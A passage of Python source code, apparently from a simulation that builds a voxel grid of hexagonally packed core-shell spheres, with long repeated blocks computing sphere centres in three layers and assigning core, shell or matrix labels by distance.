if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx15/(div))**2+(yy15/(div))**2+(zz15/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx16/(div))**2+(yy16/(div))**2+(zz16/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx17/(div))**2+(yy17/(div))**2+(zz17/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx18/(div))**2+(yy18/(div))**2+(zz18/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx19/(div))**2+(yy19/(div))**2+(zz19/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx20/(div))**2+(yy20/(div))**2+(zz20/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx21/(div))**2+(yy21/(div))**2+(zz21/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
###########################################################################################################################
###########################################################################################################################
def hex6 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
xx1=((6)*radiusc/dl-i+1)
yy1= ((6)*radiusc/dl-j+1)
zz1=(radiusc/dl-k+1)
xx2=((6-1.0)*radiusc/dl-i+1)
yy2= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz2=(radiusc/dl-k+1)
xx3=((6+1.0)*radiusc/dl-i+1)
yy3= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz3=(radiusc/dl-k+1)
xx4=((6-1.0)*radiusc/dl-i+1)
yy4= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz4=(radiusc/dl-k+1)
xx5=((6+1.0)*radiusc/dl-i+1)
yy5= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz5=(radiusc/dl-k+1)
xx6=(4*radiusc/dl-i+1)
yy6= (6*radiusc/dl-j+1)
zz6=(radiusc/dl-k+1)
xx7=(8*radiusc/dl-i+1)
yy7= (6*radiusc/dl-j+1)
zz7=(1*radiusc/dl-k+1)
xx8=((6)*radiusc/dl-i+1)
yy8= ((8+sqrt(2.0))*radiusc/dl-j+1)
zz8=(1*radiusc/dl-k+1)
xx9=((6)*radiusc/dl-i+1)
yy9= ((4-sqrt(2.0))*radiusc/dl-j+1)
zz9=(1*radiusc/dl-k+1)
xx10=((10.0)*radiusc/dl-i+1)
yy10= ((6.0)*radiusc/dl-j+1)
zz10=(1*radiusc/dl-k+1)
xx11=((3-1.0)*radiusc/dl-i+1)
yy11= ((6.0)*radiusc/dl-j+1)
zz11=(1*radiusc/dl-k+1)
xx12=((3)*radiusc/dl-i+1)
yy12= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz12=(1*radiusc/dl-k+1)
xx13=(9*radiusc/dl-i+1)
yy13= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz13=(1*radiusc/dl-k+1)
xx14=((9+0.05)*radiusc/dl-i+1)
yy14= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz14=(1*radiusc/dl-k+1)
xx15=((3)*radiusc/dl-i+1)
yy15= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz15=((1)*radiusc/dl-k+1)
xx16=((3+1+0.05)*radiusc/dl-i+1)
yy16= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz16=((1)*radiusc/dl-k+1)
xx17=((8)*radiusc/dl-i+1)
yy17= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz17=((1)*radiusc/dl-k+1)
xx18=((8)*radiusc/dl-i+1)
yy18= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz18=((1)*radiusc/dl-k+1)
xx19=((4)*radiusc/dl-i+1)
yy19= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz19=((1)*radiusc/dl-k+1)
# second layer
xx20=((6)*radiusc/dl-i+1)
yy20= ((6)*radiusc/dl-j+1)
zz20=(3*radiusc/dl-k+1)
xx21=((6-1.0)*radiusc/dl-i+1)
yy21= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz21=(3*radiusc/dl-k+1)
xx22=((6+1.0)*radiusc/dl-i+1)
yy22= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz22=(3*radiusc/dl-k+1)
xx23=((6-1.0)*radiusc/dl-i+1)
yy23= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz23=(3*radiusc/dl-k+1)
xx24=((6+1.0)*radiusc/dl-i+1)
yy24= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz24=(3*radiusc/dl-k+1)
xx25=(4*radiusc/dl-i+1)
yy25= (6*radiusc/dl-j+1)
zz25=(3*radiusc/dl-k+1)
xx26=(8*radiusc/dl-i+1)
yy26= (6*radiusc/dl-j+1)
zz26=(3*radiusc/dl-k+1)
xx27=((6)*radiusc/dl-i+1)
yy27= ((8+sqrt(2.0))*radiusc/dl-j+1)
zz27=(3*radiusc/dl-k+1)
xx28=((6)*radiusc/dl-i+1)
yy28= ((4-sqrt(2.0))*radiusc/dl-j+1)
zz28=(3*radiusc/dl-k+1)
xx29=((10.0)*radiusc/dl-i+1)
yy29= ((6.0)*radiusc/dl-j+1)
zz29=(3*radiusc/dl-k+1)
xx30=((3-1.0)*radiusc/dl-i+1)
yy30= ((6.0)*radiusc/dl-j+1)
zz30=(3*radiusc/dl-k+1)
xx31=((3)*radiusc/dl-i+1)
yy31= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz31=(3*radiusc/dl-k+1)
xx32=(9*radiusc/dl-i+1)
yy32= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz32=(3*radiusc/dl-k+1)
xx33=((9+0.05)*radiusc/dl-i+1)
yy33= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz33=(3*radiusc/dl-k+1)
xx34=((3)*radiusc/dl-i+1)
yy34= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz34=((3)*radiusc/dl-k+1)
xx35=((3+1+0.05)*radiusc/dl-i+1)
yy35= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz35=((3)*radiusc/dl-k+1)
xx36=((8)*radiusc/dl-i+1)
yy36= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz36=((3)*radiusc/dl-k+1)
xx37=((8)*radiusc/dl-i+1)
yy37= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz37=((3)*radiusc/dl-k+1)
xx38=((4)*radiusc/dl-i+1)
yy38= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz38=((3)*radiusc/dl-k+1)
# third layer
xx39=((6)*radiusc/dl-i+1)
yy39= ((6)*radiusc/dl-j+1)
zz39=(5*radiusc/dl-k+1)
xx40=((6-1.0)*radiusc/dl-i+1)
yy40= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz40=(5*radiusc/dl-k+1)
xx41=((6+1.0)*radiusc/dl-i+1)
yy41= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz41=(5*radiusc/dl-k+1)
xx42=((6-1.0)*radiusc/dl-i+1)
yy42= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz42=(5*radiusc/dl-k+1)
xx43=((6+1.0)*radiusc/dl-i+1)
yy43= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz43=(5*radiusc/dl-k+1)
xx44=(4*radiusc/dl-i+1)
yy44= (6*radiusc/dl-j+1)
zz44=(5*radiusc/dl-k+1)
xx45=(8*radiusc/dl-i+1)
yy45= (6*radiusc/dl-j+1)
zz45=(5*radiusc/dl-k+1)
xx46=((6)*radiusc/dl-i+1)
yy46= ((8+sqrt(2.0))*radiusc/dl-j+1)
zz46=(5*radiusc/dl-k+1)
xx47=((6)*radiusc/dl-i+1)
yy47= ((4-sqrt(2.0))*radiusc/dl-j+1)
zz47=(5*radiusc/dl-k+1)
xx48=((10.0)*radiusc/dl-i+1)
yy48= ((6.0)*radiusc/dl-j+1)
zz48=(5*radiusc/dl-k+1)
xx49=((3-1.0)*radiusc/dl-i+1)
yy49= ((6.0)*radiusc/dl-j+1)
zz49=(5*radiusc/dl-k+1)
xx50=((3)*radiusc/dl-i+1)
yy50= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz50=(5*radiusc/dl-k+1)
xx51=(9*radiusc/dl-i+1)
yy51= ((6-sqrt(3.0))*radiusc/dl-j+1)
zz51=(5*radiusc/dl-k+1)
xx52=((9+0.05)*radiusc/dl-i+1)
yy52= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz52=(5*radiusc/dl-k+1)
xx53=((3)*radiusc/dl-i+1)
yy53= ((6+sqrt(3.0))*radiusc/dl-j+1)
zz53=((5)*radiusc/dl-k+1)
xx54=((3+1+0.05)*radiusc/dl-i+1)
yy54= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz54=((5)*radiusc/dl-k+1)
xx55=((8)*radiusc/dl-i+1)
yy55= ((11-sqrt(3.0)+0.15)*radiusc/dl-j+1)
zz55=((5)*radiusc/dl-k+1)
xx56=((8)*radiusc/dl-i+1)
yy56= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz56=((5)*radiusc/dl-k+1)
xx57=((4)*radiusc/dl-i+1)
yy57= ((1+sqrt(3.0)-0.1)*radiusc/dl-j+1)
zz57=((5)*radiusc/dl-k+1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print (xx11,yy11,zz11,3+sqrt(3.0),float(radiusc/dl))
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
# print('aqui')
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx15/(div))**2+(yy15/(div))**2+(zz15/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx16/(div))**2+(yy16/(div))**2+(zz16/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx17/(div))**2+(yy17/(div))**2+(zz17/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx18/(div))**2+(yy18/(div))**2+(zz18/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx19/(div))**2+(yy19/(div))**2+(zz19/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx20/(div))**2+(yy20/(div))**2+(zz20/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx21/(div))**2+(yy21/(div))**2+(zz21/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx22/(div))**2+(yy22/(div))**2+(zz22/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx23/(div))**2+(yy23/(div))**2+(zz23/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx24/(div))**2+(yy24/(div))**2+(zz24/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx25/(div))**2+(yy25/(div))**2+(zz25/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx26/(div))**2+(yy26/(div))**2+(zz26/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx27/(div))**2+(yy27/(div))**2+(zz27/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx28/(div))**2+(yy28/(div))**2+(zz28/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx29/(div))**2+(yy29/(div))**2+(zz29/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx30/(div))**2+(yy30/(div))**2+(zz30/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx31/(div))**2+(yy31/(div))**2+(zz31/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx32/(div))**2+(yy32/(div))**2+(zz32/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
